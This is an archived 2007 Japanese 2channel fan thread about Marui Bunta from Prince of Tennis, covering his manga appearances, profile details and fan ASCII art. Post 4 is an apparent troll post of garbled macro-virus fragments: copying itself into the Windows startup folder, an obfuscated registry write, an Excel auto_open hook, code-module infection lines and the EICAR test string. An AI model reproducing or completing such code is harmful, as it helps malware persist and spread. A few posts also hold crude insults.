5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【テニプリ】丸井ブン太スレ・ガム2.5個目(ゝα・)【天才的妙技】

1 :名無しかわいいよ名無し:2007/10/20(土) 04:45:16 ID:jioeKo7z
立海大附属中三年 天才的にカッコカワイイ丸井ブン太君に萌えるスレです
2
http://anime2.2ch.net/test/read.cgi/cchara/1176995984/l50
2.5
http://anime2.2ch.net/test/read.cgi/cchara/1179686806/l50
(dat落ち)

ルール
・sage進行
・早バレ禁止
・煽り、荒らしは天才的にスルー
・ミュネタ、声優ネタは程々に
・ドリーム・801・なりきりは該当板へ
・次スレは>>980シクヨロ

プロフィール/164センチ・50kg代前半(20.5巻は誤植です) 4月20日生まれ B型

ブン太の活躍は以下のとおり
原作23巻 OVA全国大会篇6巻(オーコメ)
CD/ WINDY ROAD、 BRAND NEW DAY
GAME/ 最強チーム、学園祭の王子様、ドキドキサバイバル海編

2 :名無しかわいいよ名無し:2007/10/20(土) 04:46:08 ID:jioeKo7z
保守

3 :名無しかわいいよ名無し:2007/10/20(土) 04:47:03 ID:jioeKo7z
     , ィ '´_         ヽ、
   /   '          ヽ
  /  /             `,
. /  /              、 !
 !   /.    /     .! ヽ   ヽ!
 !  !   〃/     !  !  !    ヽ、
../ _,/   .!| i      .! ハ  .! . へ<`
/ノ!r '!´ ! |.||'! |    ! ! ! ! !ヽ!! `
!' ! /!  !_リニ!_|ハ.   //イ! / !.! !!
.  |  ハ,.!ヽ!rソゞ,! ! /リ !シノ! / .|  !
.  .! リ_ ヽ` ̄   リ!/      ! / ./、
/ !.!!`ハ!`ヽ、   !    ノ!´  /! ヽ、
  r'ヽ!|ヘ、.    、!>   ´ ,ィリv'!/   !>
<´ヽ  ゝ .ヽ、`ー==ー´ /、 ――、 .! !
 `ヽ\!   .\    イ   ` ‐、  >' !
     \    `ヽ‐ ´/ /`ー---ー/`! !
――、  >     ! / /     ノ'  !.|
    `ヽ_!     /!/!/!    /  / !

4 :名無しかわいいよ名無し:2007/10/20(土) 05:34:34 ID:EUcoaFdq
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub



5 :名無しかわいいよ名無し:2007/10/20(土) 07:58:32 ID:kQ5Q8Hca
乙です。

それにしても…ブン太…

6 :名無しかわいいよ名無し:2007/10/20(土) 09:08:50 ID:1BZ+eEth
う・・・落ちちゃったの?
スレ立て乙

7 :名無しかわいいよ名無し:2007/10/20(土) 14:48:22 ID:KHEcuJYx
>>1


dat落ち激しいな・・・
これからは1日1レスを心がけよう

8 :名無しかわいいよ名無し:2007/10/20(土) 16:07:35 ID:uvVA+7Q9
落ちるなんて不吉な

9 :名無しかわいいよ名無し:2007/10/20(土) 18:15:01 ID:vUPLnmhh
あげるぜぃ…

10 :名無しかわいいよ名無し:2007/10/20(土) 19:14:40 ID:VWeK7ILp
>>1
ほんとに乙。

もっと書き込みするようにするよ。
すまんブン太;;

11 :名無しかわいいよ名無し:2007/10/21(日) 00:11:40 ID:qIuoOXPy
1日1ブン太

12 :名無しかわいいよ名無し:2007/10/21(日) 06:39:35 ID:2pXK7euB
年内に1回くらい喋りますように

13 :名無しかわいいよ名無し:2007/10/21(日) 19:19:10 ID:LqRrYqsz
いつも落ちてしまうのはブン太の話題がないからなのか そうなのか・・・ブン太


14 :名無しかわいいよ名無し:2007/10/22(月) 05:43:44 ID:gKtEONay
話題がなくても集まるスレは集まるからそうとも言えないけど…

試合もうすぐだしwktk

15 :名無しかわいいよ名無し:2007/10/22(月) 06:13:07 ID:PjIY0fHJ
え?試合出るの?
ジャンプ買ってくる!!!

16 :名無しかわいいよ名無し:2007/10/22(月) 18:43:45 ID:FbrOMc+Z
あげ

17 :名無しかわいいよ名無し:2007/10/22(月) 22:30:39 ID:VwNJQRrd
ブン太とジローちゃんって声似てるね。
Brand New Day聴いたとき最初分からなかったよ 

18 :名無しかわいいよ名無し:2007/10/23(火) 00:25:09 ID:8IwCeM1O
そういやどっちがどこ歌ってるかわかんなくてここで聞いたことあった

19 :名無しかわいいよ名無し:2007/10/23(火) 23:18:24 ID:eqo/WJpI
ブン太の試合もうすぐだ

20 :名無しかわいいよ名無し:2007/10/24(水) 01:15:09 ID:piE+nx54
ブン太試合応援してる?

21 :名無しかわいいよ名無し:2007/10/24(水) 07:11:31 ID:+hOxSl0i
応援するぞ!
勝ったらお祝いにガムとケーキ買うぞw

22 :名無しかわいいよ名無し:2007/10/24(水) 23:55:20 ID:dLmdC3rF
ブン太CD出してくれないかなぁ。。
ソロではもちろんのこと3グァバとかまるっきりコンビとか


23 :名無しかわいいよ名無し:2007/10/25(木) 01:17:14 ID:WRtP86z9
まるっきりいいな!
赤也も全然出してない事だし

24 :名無しかわいいよ名無し:2007/10/25(木) 08:01:34 ID:mzuSVpnj
キャラ的には合うけど、
歌うとなると声質的に合わなさそう

25 :名無しかわいいよ名無し:2007/10/26(金) 20:16:07 ID:Or191wTk

        ッパ
   ノ"⌒`丶   
   ソ 从 从 □ ←CD  
   W ・ω・)丿       
  ノ/  /  
   ノ ̄ゝ   



26 :名無しかわいいよ名無し:2007/10/27(土) 02:27:20 ID:ZQ2xhwrP
>>25
かわいい

CDは3グァバもまるっきりも難しそう
ジローの人と赤也の人って忙しそうだしブン太の人より契約とかいろいろあるんじゃない?

27 :名無しかわいいよ名無し:2007/10/27(土) 09:07:45 ID:q6n3nuMQ
下がりすぎだから上げとくぜい

28 :名無しかわいいよ名無し:2007/10/27(土) 11:14:13 ID:UQNOoXTG
契約とかの問題があるのか‥
ブン太のバレキス聞いてみたかったな(´;ω;`)

29 :名無しかわいいよ名無し:2007/10/27(土) 19:06:14 ID:tRCNmNrA
>>25可愛すぎる

ブン太のバレキスはかなり聴いてみたいね
誰よりもカッコカワイく仕上がるだろうに

30 :名無しかわいいよ名無し:2007/10/28(日) 02:44:28 ID:oxovdTVr
バレキス聞きたい。
てかブン太ならなんでもいい。

OVAのOPとかEDの曲歌ったりしないかなぁ

31 :名無しかわいいよ名無し:2007/10/28(日) 02:50:46 ID:WC+Sy5Ez
ユニット入ってほしいな

32 :名無しかわいいよ名無し:2007/10/29(月) 00:17:32 ID:WfoVqE+j
age

33 :名無しかわいいよ名無し:2007/10/29(月) 03:00:13 ID:CkNTuaZl
ブンブン
ブン太ブンブン

34 :名無しかわいいよ名無し:2007/10/29(月) 06:03:51 ID:4I7mXHQh
ブン太って髪型もカッコイイ
ふわふわ感がカワイイ
最近崩れがちなのが悲しいが

35 :名無しかわいいよ名無し:2007/10/29(月) 19:57:35 ID:lq9Pb0KS
拾いました。
    
    /ハ           
   ノ"⌒`丶   
   ソ 从 从 
   W ・ω・)  
  {  U Ul
   ヾ.,____,ノ


ごめんブン太。何も書き込む事が思い浮かばないよw

36 :名無しかわいいよ名無し:2007/10/29(月) 21:43:22 ID:fU98BdK2
いや、今週ちょっと載っててくれただけでもありがたい…

きっと次の試合では、活躍してくれるはずだから

37 :名無しかわいいよ名無し:2007/10/29(月) 22:22:07 ID:lq9Pb0KS
>>36
え?そうなの??
最近ジャンプ見てないから分からなかった。

よし次週からはちゃんとチェックしよう。thx

38 :名無しかわいいよ名無し:2007/10/30(火) 12:12:24 ID:EGo3Ivfm
あげる。

39 :ぴか:2007/10/30(火) 15:39:14 ID:yHwRofnM
>>35
カワユスvv

40 :名無しかわいいよ名無し:2007/10/30(火) 23:02:05 ID:ZzFaN7Ep
ブン太はおひつじ座だとばかり思ってたけど、おうし座だったんだね。
どってでもいいけどずっと勘違いしてたよ。ごめんよブン太

ってことで保守。いや死守

41 :名無しかわいいよ名無し:2007/10/30(火) 23:21:48 ID:PLbSAVL0
>>40
いや、丸井の誕生日4/20は星座占いにおける境目の日だから、占い方によって
星座が違う事がよくある。だから牡羊座でもおかしくない。
立海繋がりで真田(5/21)も境目の日、公式ファンブックでは牡牛座扱いだが
占い方によっては双子座扱いだったりするし。
あと境目に当たるのは1/20、9/23、12/22あたりか。
その人の性格や好みで決めちゃっていいんじゃないかな?

42 :名無しかわいいよ名無し:2007/10/30(火) 23:33:28 ID:ZzFaN7Ep
>>41
mjk!知らなかった。
というか真田が5月生まれってこと自体わすれ(ry

まぁ公式で5月21日の真田がおうし座っていってるんだから真田副部長はおうし座か・・・
情報ありがとう

43 :名無しかわいいよ名無し:2007/10/31(水) 01:31:55 ID:IW6UpMz/
 
   <::ヽ
     |::::::\
   ∠ニニニ`_、
    ソ 从 从    
     W ・ω・)         / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
    /::::::ハ::::ヽ       <  Trick or Treat!
   /:::::OO::(つ=  /         腹減った。お菓子くれよ!
  ノ:::::::::::::::::ノ(・∀・) ―
  `〜〜'~      \


44 :名無しかわいいよ名無し:2007/10/31(水) 09:14:32 ID:tDxJXiP7
占いの本で4月20日生まれの人は、s●xや食べ物で欲求を満たすと書いてあった


45 :名無しかわいいよ名無し:2007/10/31(水) 10:32:14 ID:vR729JQA
>>43
もうカボチャ食べまくったでしょ

仮装用のカボチャまで食べちゃうんだから…

46 :名無しかわいいよ名無し:2007/10/31(水) 11:07:31 ID:tz9cBPao
ブン太へ
ttp://www.pawanavi.com/gourmet2/archives/images/sweets13.jpg
ttp://www.vingtsept27.co.jp/img/page4/cakebikin1.jpg
ttp://www.k2.dion.ne.jp/~sen-nen/LOVELOG_IMG/VFSH0225.JPG
ttp://www.tengallon.co.jp/2003xmas/03-8.jpg

47 :名無しかわいいよ名無し:2007/10/31(水) 17:06:08 ID:jBpAs0o0
そういえば学プリで桃城とケーキバイキングの話してたよなw
ブン太は最高記録50個、しかももっと食べられたのにケーキがなくなったとか言ってたっけw

48 :名無しかわいいよ名無し:2007/10/31(水) 19:41:51 ID:5NYHkoTb
ブンちゃん試合出て欲しい!!

49 :名無しかわいいよ名無し:2007/10/31(水) 21:19:07 ID:TG/KpMCq
今週ブン太いたね

50 :名無しかわいいよ名無し:2007/11/01(木) 10:54:42 ID:tpCXkVlH
あげ

51 :名無しかわいいよ名無し:2007/11/01(木) 22:16:23 ID:p5bBR+hU
1日1ブン

52 :名無しかわいいよ名無し:2007/11/02(金) 01:10:06 ID:TupMj2UQ
ブン太の家族構成どんなだっけ?

53 :名無しかわいいよ名無し:2007/11/02(金) 01:52:22 ID:rHbUOgcv
>>52
祖母、父、母、ブン太似の弟×2

54 :名無しかわいいよ名無し:2007/11/02(金) 06:56:30 ID:sudSRsba
双子を想像してしまう

55 :名無しかわいいよ名無し:2007/11/02(金) 08:29:11 ID:gmiWiNzQ
何気におばあちゃん子だったらもえる

56 :名無しかわいいよ名無し:2007/11/02(金) 23:18:41 ID:LCkJ7p7n
弟ブン太似っていうのどこに書いてある?
双子かわいいなあ

57 :名無しかわいいよ名無し:2007/11/03(土) 14:20:52 ID:i9Lprmpf
( ・α・)

58 :名無しかわいいよ名無し:2007/11/03(土) 15:29:52 ID:BY8P0RWC
お兄ちゃんぶってそうで可愛い

59 :名無しかわいいよ名無し:2007/11/03(土) 15:49:04 ID:Lxh56q4x
>>56
公式には一切書いてない。はず。

でもその方が萌えるじゃないか!小ブン太が2人もいるなんて!

60 :名無しかわいいよ名無し:2007/11/03(土) 16:49:36 ID:VldR1JdE
40.5ハガキ出した?
名前の由来全然思いつかなかった…

61 :名無しかわいいよ名無し:2007/11/03(土) 19:58:13 ID:mgzGTb3m
ブン太の弟だったらやっぱり
ベン太とボン太だな!

62 :名無しかわいいよ名無し:2007/11/03(土) 20:01:06 ID:69HBoXHd
いやむしろ三つ子でいいんじゃないか
ブン太は三つ子の長男で

63 :名無しかわいいよ名無し:2007/11/03(土) 22:08:06 ID:jUYVT2nj
そういえば「3びきの子ブン太」って童話あったね

64 :名無しかわいいよ名無し:2007/11/04(日) 14:26:13 ID:TeM/S1UN
3匹の子ブン太

65 :名無しかわいいよ名無し:2007/11/04(日) 14:29:29 ID:TeM/S1UN
すまん途中送信してしまった…

3匹の子ブン太www萌えるwww

と書きたかった

66 :名無しかわいいよ名無し:2007/11/04(日) 15:46:07 ID:30cvFV1c
何しても 可愛い男 丸井君

67 :名無しかわいいよ名無し:2007/11/05(月) 01:30:00 ID:jPkPXDSd
グリーンアップルガム差し入れしたい

68 :名無しかわいいよ名無し:2007/11/05(月) 11:00:39 ID:cPTdz4i5
来週ついにブン太登場

69 :名無しかわいいよ名無し:2007/11/06(火) 01:12:33 ID:XAgB920S
D1ブン太だといいな…

70 :名無しかわいいよ名無し:2007/11/06(火) 01:47:35 ID:W/g9RK+1
ブン太でしょう!

71 :名無しかわいいよ名無し:2007/11/06(火) 12:56:07 ID:kaaR5v3/
決勝入ってセリフなし稀にしか登場しない  
これでD1ブン太じゃなかったらもう笑うしかない

72 :ぴか:2007/11/06(火) 14:18:29 ID:3P11Cpi8
来週超楽しみだ(^v^)絶対D@には出ると思うけど、セリフ少なかったりしたらヤダ
この試合最初から負けると分かっていても応援するのは立海!!

73 :名無しかわいいよ名無し:2007/11/06(火) 18:03:37 ID:QrsJvFrD
あげんなよブス
HNだっせーし

74 :名無しかわいいよ名無し:2007/11/06(火) 18:56:51 ID:yQ/PfCUA
>>73
一月程前からこんな調子なんだよ、これ

75 :名無しかわいいよ名無し:2007/11/06(火) 21:47:50 ID:13OIibP2
>>73
まぁまぁ落ち着いて。

それよりDSで1月にゲームが出るみたいだけどみんな買う?
DS自体持ってないから痛い出費になりそうだけど
ブン太からの遅いクリスマスプレゼントだと思えばまぁいいか。
このゲーム「タッチペンでキャラクターに触れることができる」
ってあるけどブン太いじられるのか(*´Д`)


76 :名無しかわいいよ名無し:2007/11/06(火) 22:50:28 ID:SdY1aI2z
うっわなんだそれww絶対買うし!!

77 :名無しかわいいよ名無し:2007/11/07(水) 01:23:03 ID:ex9ikUCc
ジャンプ読んできた。
次はとうとうブン太・・・と思わせといてジャッカルと柳生とか
ないよな。たしけを信じる。

78 :名無しかわいいよ名無し:2007/11/07(水) 16:08:52 ID:n3I1e9Co
ブン太は技とか進化させやすくて
たしけ的にも描きやすい、というメリットがあるから
登場はあると信じている

79 :名無しかわいいよ名無し:2007/11/07(水) 18:00:28 ID:svOIcjrS
某眼鏡天才は何の伏線も無しに技数の桁が3つ増えたくらいだからな
天才的なブン太もありうる。全部「妙技」って付くだろうけど

80 :名無しかわいいよ名無し:2007/11/08(木) 18:12:49 ID:xANhMTot
心配

81 :名無しかわいいよ名無し:2007/11/08(木) 18:53:07 ID:NvhMpCWN
たしけなら出してくれる

出してくんなかったら絶交だ

82 :名無しかわいいよ名無し:2007/11/08(木) 22:18:18 ID:ms0bBkwM
ジャッカルと柳生だと地味すぎるからブン太を出してくれると信じてる

83 :名無しかわいいよ名無し:2007/11/09(金) 00:46:10 ID:d8xqUOcq
新たな妙技に期待

84 :名無しかわいいよ名無し:2007/11/09(金) 01:09:06 ID:Fmq3PnAj
>>82他キャラの悪口は不快だからやめような。
ブン太含め、ジャッカルも柳生も(もしくは立海自体)好きな人沢山居るしさ

85 :名無しかわいいよ名無し:2007/11/09(金) 07:43:29 ID:/DKoL7ml
>>84
ごめん
これから気をつける

86 :名無しかわいいよ名無し:2007/11/10(土) 12:26:10 ID:VjhQfN4P
※ネタバレ


見たくない人はスルーで






























D1ジャッカル、丸井

87 :名無しかわいいよ名無し:2007/11/10(土) 12:45:50 ID:AycGSPGm
専ブラじゃ丸見えなんですけど
>>1読んで
そんで氏ね

88 :名無しかわいいよ名無し:2007/11/10(土) 13:10:02 ID:O/sgdS1N
ジャンプって今日発売じゃなかったっけ?

89 :名無しかわいいよ名無し:2007/11/10(土) 14:39:10 ID:jUMSPcMC
月曜だよ
てかここでバレ書く必要ないから
知りたいやつは本スレ行くだろうし

90 :名無しかわいいよ名無し:2007/11/10(土) 17:49:50 ID:fr4UC6dC
早くカッコカワユスなブン太を拝みたい

91 :名無しかわいいよ名無し:2007/11/10(土) 21:31:50 ID:uNJH/s8V
次週仁王が可哀想過ぎ…ブンちゃん、カタキとれっ


たしけは立海に怨みでもあるのだろうか…


92 :名無しかわいいよ名無し:2007/11/11(日) 01:08:15 ID:LSy9J9Ma
リョーマが主人公だから青学が負けるわけには…って感じだと思う。ブン太早く見たい

93 :名無しかわいいよ名無し:2007/11/12(月) 01:40:48 ID:lSo25eR6
流れ考えるとブン太は…だけど応援

94 :名無しかわいいよ名無し:2007/11/12(月) 04:18:51 ID:uOrnb5vz
ブン太かっこいいー!
流れはしょうがないけど、納得のいく試合してくれればいいかな

95 :名無しかわいいよ名無し:2007/11/12(月) 09:51:18 ID:D5xAOBiD
ブン太登場記念あげ

96 :名無しかわいいよ名無し:2007/11/12(月) 15:29:22 ID:DCHKdLT9
久々にまともに登場したブン太・・
相変わらずカッコ良すぎる
やっぱりカッコイイ本当にカッコイイ

97 :名無しかわいいよ名無し:2007/11/12(月) 19:52:54 ID:8gY6OuXE
ブンちゃん髪伸びたね

98 :名無しかわいいよ名無し:2007/11/12(月) 21:36:40 ID:y+IO1Oep
少し前の岳人スレより転載

178: 2007/10/22(月) 16:21:05 ID:xEb/aCYe[sage]
((( ゚д゚)<丸井先輩どこ行ったんだぁ? フクブチョウニオコラレル…

( ゚∀゚) !        スゲー!川б∀б川 (ゝα・)テンサイテキダロィ?

(((( ゚∀゚)<丸井先輩帰りましょー 川б∀б川<あ、切原 (・α・)<おー、赤也。わりぃな

早く帰らないと副部長に怒られるっスよ>( ゚∀゚)つ⊂川бдб川Σ    Σ(・α・)

副部長怒ってないといいけどなー>(゚∀゚ )つ⊂川бдб;川)))) エ、チョ…          (・α・;)

<オレハマルイジャネー! エー、ドウミタッテマルイセンパイデショ? (・α・;)

(・α・ )

( ・α・ )

99 :名無しかわいいよ名無し:2007/11/13(火) 00:13:08 ID:Txmz1W7b
ブン太かわいかった。
登場回数増えるといいな

100 :名無しかわいいよ名無し:2007/11/13(火) 01:43:12 ID:qHXT9nfj
丸井の左目はどこにいってしまったんだ……!!

101 :名無しかわいいよ名無し:2007/11/13(火) 02:47:44 ID:sQKFjADU
ごめんかわいいけど意味がよくわかんない…
岳人とブン太が似てるってこと?

102 :名無しかわいいよ名無し:2007/11/13(火) 13:18:18 ID:l6aMPYo+
私もテニプリをまだあんまり知らなかった頃は
向日と丸井は同一人物だと思ってたな

103 :名無しかわいいよ名無し:2007/11/13(火) 19:21:40 ID:pEJWjizX
当然だろぃ

104 :名無しかわいいよ名無し:2007/11/13(火) 21:28:34 ID:JIrz3W2f
クチャクチャじゃなくて
モグモグってとこがまたガムユス

105 :名無しかわいいよ名無し:2007/11/14(水) 01:13:37 ID:27U0E5Ov
見てたらガム食べたくなるわ

106 :名無しかわいいよ名無し:2007/11/14(水) 16:20:40 ID:V5eA9yN1
今週の「当然だろぃ」って台詞の
ブン太の顔が一瞬比嘉中の甲斐に見えた

107 :名無しかわいいよ名無し:2007/11/15(木) 10:51:07 ID:SooYGKqs
あげるぜい

108 :名無しかわいいよ名無し:2007/11/16(金) 00:55:36 ID:zXF4Uppo
身長何cmだっけ?体重は10kg間違えてたんだよね?

109 :名無しかわいいよ名無し:2007/11/16(金) 06:18:52 ID:dALl4PGE
162くらいだったと

110 :名無しかわいいよ名無し:2007/11/16(金) 08:02:16 ID:cjAc8qyg
164だよ
これからちゃんと伸びるのかな・・・

111 :名無しかわいいよ名無し:2007/11/16(金) 08:05:28 ID:h6numn3U
2センチ足りてないよ164だよ!!!!

当初体重の件はパワーリスト入れた重さだとか
赤也が悪戯で書いたとか思うようにしてましたw
よりにもよって食いしん坊で名前がブタ的な
ブン太が体重間違われるなんて紛らわしい

112 :名無しかわいいよ名無し:2007/11/16(金) 18:29:33 ID:ixbhAV0n
てか、それら>1に書いてあるじゃまいか君達

113 :名無しかわいいよ名無し:2007/11/16(金) 18:45:00 ID:vfb1lSfg
携帯から見てるリアばっかりだから>1は読めないの

114 :名無しかわいいよ名無し:2007/11/16(金) 19:20:29 ID:u8hPr6YE
>>111
体重は間違えないで欲しかった
なんでよりによって体重を間違えるんだと思ったw
せめて痩せてるほうに間違えてほしかったぜぃ

115 :名無しかわいいよ名無し:2007/11/16(金) 21:53:57 ID:YAyu/RCl
当時はまぁこんなもんだろうなと思ったよ私ww
お腹がポンって出てるのかなとか考えた

116 :名無しかわいいよ名無し:2007/11/16(金) 23:59:22 ID:8rGYwZJ/
テニスしてる私の弟は見事に164センチ62キロだったりするけど
見た目は全く太ってるようには見えないしお腹も出てない。むしろ身体締まってる
スポーツやってる人は筋肉質で、筋肉は重いから正直このくらいは普通だそうだ
だから20.5巻見ても違和感は全くなかったし
訂正されたと聞いたときは、ブン太は筋肉ないのか……と逆にショボンだったなw

いずれにせよ男の子は高校でもまたぐんと伸びるから、また一段とカッコよくなるんだろうな
本誌での活躍も楽しみだよブン太

117 :名無しかわいいよ名無し:2007/11/17(土) 01:03:40 ID:2eL+E2nm
ブン太の正式体重がしりたいがために
40.5を買ってしまいそうだ・・・。

118 :名無しかわいいよ名無し:2007/11/17(土) 14:04:08 ID:rAi91uPC
本当に164cm62kgだったらガチムチブン太兄貴になってしまいそう

119 :名無しかわいいよ名無し:2007/11/18(日) 03:21:20 ID:z15We4O+
ブン太結構細いからな…やっぱ軽いのか。
それか62kgっていうのはケーキやご飯食べた後に体重測ったとか?

120 :名無しかわいいよ名無し:2007/11/18(日) 10:18:19 ID:ti8ucr09
10kgもケーキやご飯を食べたって事か?!


121 :名無しかわいいよ名無し:2007/11/18(日) 11:58:54 ID:+JROayeT
なんというフードファイターっぷり

122 :名無しかわいいよ名無し:2007/11/18(日) 21:31:23 ID:8o5svBTy
ポケモンのカビゴンは体重460kgで一日に食べる量は400kg
ならブン太が10kg食べても不思議じゃないさ!


っていう屁理屈を述べてみる

123 :名無しかわいいよ名無し:2007/11/19(月) 00:38:23 ID:+Ghr1JCa
ちょ…なにこれ…
今週のブン太かっこよすぎ…

124 :名無しかわいいよ名無し:2007/11/19(月) 16:59:25 ID://qZqmgg
100曲マラソンにブン太とジャコーはでないんだねorz

125 :名無しかわいいよ名無し:2007/11/19(月) 21:06:29 ID:j7JCgyf2
直純さん忙しそうだもんな…

126 :名無しかわいいよ名無し:2007/11/20(火) 06:48:26 ID:5ns9p1pF
ブン太ついにパワーリスト外したね
異常なカッコよさでしたね
来週は「その頃」扱いから抜け出せるのだろうか

127 :名無しかわいいよ名無し:2007/11/20(火) 22:28:51 ID:ndkmgbZi
まだ今週のブン太拝んでない
明日見に行こう

128 :名無しかわいいよ名無し:2007/11/21(水) 15:59:26 ID:qrzsQiXx
リョーマの記憶喪失とか邪魔すぐる設定だな
ちゃんと試合見せて欲しい

129 :名無しかわいいよ名無し:2007/11/22(木) 03:32:27 ID:nFgb7hBZ
その頃…のあと、急に場面転換してブン太が圧倒的に勝ってるor負けてる とかやだな
最終戦なんだからブン太に限らず全試合じっくり見たいけど、ワガママかね

130 :名無しかわいいよ名無し:2007/11/22(木) 06:14:54 ID:oNLD1yje
ゴールデンペアとの試合だからちゃんと描いてくれるかな…
でもD2けっこうあっさり終わった

131 :名無しかわいいよ名無し:2007/11/22(木) 18:34:13 ID:1u9cteHQ
今週ブン太見てコンビニでニヤニヤしてしまった

132 :名無しかわいいよ名無し:2007/11/22(木) 21:11:00 ID:R3G52BAB
いのししですら出番があるからきっとちゃんと試合見れるよ!

と意味不明な期待をしてみる

133 :名無しかわいいよ名無し:2007/11/22(木) 23:17:24 ID:E2yN4t1k
>>131
me too

134 :名無しかわいいよ名無し:2007/11/22(木) 23:51:47 ID:/JmEgEIw
ジャンプどこ行っても売り切れだった;;


135 :名無しかわいいよ名無し:2007/11/23(金) 00:14:51 ID:1CKLUt1S
ブン太が省略されたら
ブン太が出てないテニフコミックスだけ売るさ

136 :名無しかわいいよ名無し:2007/11/23(金) 09:57:49 ID:y+KorF1Z
23巻は永久保存

137 :名無しかわいいよ名無し:2007/11/23(金) 22:16:27 ID:6on742fB
ブンブンブン太

138 :名無しかわいいよ名無し:2007/11/24(土) 01:58:07 ID:1vThaoNR
ブンブン

139 :名無しかわいいよ名無し:2007/11/24(土) 03:02:54 ID:Qv4QWHFJ


140 :名無しかわいいよ名無し:2007/11/24(土) 09:18:35 ID:2EKlp5R9
立海ってマフラー規定なの?あのチェック柄はブン太が1番似合う

141 :名無しかわいいよ名無し:2007/11/24(土) 23:19:38 ID:IaaVy1m4
マフラーは指定みたいだね。
最初バー○リーかと思って「中学生なのにバー○リーなんてブルジョアめw」と嫉妬したが

142 :名無しかわいいよ名無し:2007/11/25(日) 03:57:56 ID:7EbJc9jW
あのマフラー可愛いよね。似合うよ

143 :名無しかわいいよ名無し:2007/11/25(日) 07:33:33 ID:/fo02tBS
あのマフラー、バー〇リーに見える?
今って中学生でもバー〇リーとかフェ〇ディのマフラーしてるよ。
自分も中学生の時バー〇リー使ってた。一般家庭だけど。

144 :名無しかわいいよ名無し:2007/11/25(日) 11:33:50 ID:fnuHO8cw
バーバリーに見えないけん

145 :名無しかわいいよ名無し:2007/11/25(日) 15:00:37 ID:Ccfv/5Gd
明日のジャンプブン太でますように

146 :名無しかわいいよ名無し:2007/11/25(日) 16:33:06 ID:pq5Gdbqo
ブン太ってそれなりに人気あるよね?
だってあんなにカッコイイもんね?
人気ないとか空気だなんてありえないよね?
舞台もライブも出番がないのは
役者に恵まれなかっただけだよな
頼むから一番重要な原作ぐらいは活躍してくれ

147 :名無しかわいいよ名無し:2007/11/26(月) 00:57:26 ID:RphJP8o3
ブ・・ブン太が・・・
い な い・・・!!!

148 :名無しかわいいよ名無し:2007/11/26(月) 16:59:17 ID:RSRVEZ2d
ブン太・・一コマもいないなんて・・・

149 :名無しかわいいよ名無し:2007/11/27(火) 00:49:09 ID:1JrvZKoj
絶望した

150 :名無しかわいいよ名無し:2007/11/27(火) 00:58:07 ID:07S3IknS
所詮こんなもんだろぃ

151 :名無しかわいいよ名無し:2007/11/27(火) 01:53:04 ID:We6FlYDB
次出る頃には3ゲームほど終わってそう

152 :名無しかわいいよ名無し:2007/11/27(火) 11:42:54 ID:hX4t9SNh
>>151
あるあるあ(ry

(´・ω・`)

153 :名無しかわいいよ名無し:2007/11/27(火) 18:49:24 ID:P6Z6y5lu
扉絵でブン太メインで描いてほしい

154 :名無しかわいいよ名無し:2007/11/28(水) 01:07:07 ID:YiEaItbN
40・5巻でブン太の体重をキチンとやってほしいブン太ならなんでも良いがハッキリさせてほしい!
・・・漏れの母さんブン太と髪型カブってるんだぜぃ・・・そんなの関係ねぇがな・・

155 :名無しかわいいよ名無し:2007/11/28(水) 06:48:35 ID:n1SV/R43
ブン太の部屋とか出ないのかな あと弟の顔みせてほしい

156 :名無しかわいいよ名無し:2007/11/28(水) 22:35:20 ID:yEz9ja5D
誰か 

胡座かいて、いじわるそうな顔をしながら
弟を後ろから羽交い締めにして喜んでいるブン太

を く だ さ い

157 :名無しかわいいよ名無し:2007/11/28(水) 23:29:53 ID:YiEaItbN
(・α<)/

158 :名無しかわいいよ名無し:2007/11/29(木) 03:30:15 ID:GR8gY8O+
>156

 (`α´)
 <○>
 <ノ|ヽ>
  ハ

159 :名無しかわいいよ名無し:2007/11/29(木) 15:58:51 ID:FXlMnDQi
>>158
食い過ぎで動けなくなりて
ジャッカルにおんぶさせてるブン太
に見えてしまい鬱

160 :名無しかわいいよ名無し:2007/11/29(木) 19:32:52 ID:6K+u12Wn
>>159
そんな風にしか見えなくなったじゃないかw


28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)